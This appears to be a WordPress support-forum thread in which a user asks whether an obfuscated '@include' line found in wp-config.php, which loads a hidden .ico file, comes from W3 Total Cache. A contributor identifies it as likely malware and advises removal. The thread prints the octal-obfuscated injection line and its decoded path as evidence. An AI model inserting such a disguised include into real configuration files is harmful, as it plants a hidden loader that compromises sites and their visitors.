• Resolved nursyfqh

    (@nursyfqh)


    Hi W3TC,

    Does this code “@include….” have anything to do with W3TC plugin? I found this code on wp-config. The security plugin detect wp-config as malicious file.

    ——————————————————–

    <?php
    /** Enable W3 Total Cache */
    define(‘WP_CACHE’, true); // Added by W3 Total Cache

    /** Enable W3 Total Cache */
    /*1b5f8*/
    @include “\057ho\155e/\171os\150im\141r/\160ub\154ic\137ht\155l/\144ur\151an\142ik\145rs\056co\155/w\160-c\157nt\145nt\057.7\1411b\06474\065.i\143o”;
    /*1b5f8*/
    /** Enable W3 Total Cache */
    // Added by WP Hummingbird
    /** Enable W3 Total Cache */

    ——————————————————–

    I also decode this code and got this:

    /*1b5f8*/@include “/home/yoshimar/public_html/durianbikers.com/wp-content/.7a1b4745.ico”;/*1b5f8*/

    I hope you can help me. Thank you so much.

Viewing 2 replies - 1 through 2 (of 2 total)
  • Plugin Contributor Marko Vasiljevic

    (@vmarko)

    Hello @nursyfqh

    Thank you for your inquiry and I am happy to assist you with this.
    The only thing that W3 Total Cache adds to wp-config.php is the following:

    /** Enable W3 Total Cache */
    define(‘WP_CACHE’, true); // Added by W3 Total Cache

    W3 Total Cache does not add the mentioned @include and I am not sure where this is coming from. As this is a possible malware you should make a backup of wp-cofing.php and remove those lines.
    you can also safely remove the leftovers:

    /** Enable W3 Total Cache */
    // Added by WP Hummingbird
    /** Enable W3 Total Cache */

    Thanks!

    Thread Starter nursyfqh

    (@nursyfqh)

    okay thank you so much ??

Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘Unknown code’ is closed to new replies.